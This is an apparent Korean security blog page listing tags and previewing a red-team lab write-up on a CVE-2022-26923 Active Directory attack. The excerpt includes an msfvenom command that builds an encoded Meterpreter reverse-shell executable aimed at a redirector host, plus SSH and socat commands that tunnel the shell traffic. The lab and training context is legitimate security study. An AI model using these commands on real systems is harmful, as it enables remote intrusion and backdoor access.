| 일 | 월 | 화 | 수 | 목 | 금 | 토 |
|---|---|---|---|---|---|---|
| 1 | ||||||
| 2 | 3 | 4 | 5 | 6 | 7 | 8 |
| 9 | 10 | 11 | 12 | 13 | 14 | 15 |
| 16 | 17 | 18 | 19 | 20 | 21 | 22 |
| 23 | 24 | 25 | 26 | 27 | 28 | 29 |
| 30 | 31 |
Tags
- 리버싱
- CodeEngn
- cve-2024-6387
- 디포전 2급
- malware
- 정보기
- 디지털 포렌식 트랙
- 뮤텍스
- 디지털 포렌식 전문가 2급
- 세마포어
- BoB 12기
- 프로그래머스
- 필기
- bob
- 정보보안기사
- race condition
- 디포전
- 논문리뷰
- DLL 사이드로딩
- BoB 12기 최종합격 후기
- 코드엔진
- Best of the Best
- cve-2022-26923
- dll side-loading
- Active Directory
- h4ckinggame
Archives
- Today
- Total
목록2025/03/29 (1)
SEO
CVE-2022-26923 기반 Active Directory 공격 실습 - 펜테스팅
본 시나리오와 실습은 금융보안아카데미 내 금붕어 아카데미 팀 프로젝트에서 진행하였습니다. 시나리오 기반 펜테스팅1. 공격 준비msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai 0i 5 -b '\x00' LHOST=[리다이렉터 IP] LPORT=80 -f exe > payload.exe리버스 쉘을 연결하는 Meterpreter 백도어를 생성하였습니다. ssh -i goldfish-redteam ubuntu@[EC2 IP] -R [EC2 아웃바운드 포트 번호]:127.0.0.1:[KALI 인바운드 포트 번호]HTTP 리다이렉터(EC2)의 2222 포트로 나가는 트래픽을 칼리의 4321 포트 전송합니다. sudo socat tcp-list..
Security/RedTeam
2025. 3. 29. 15:34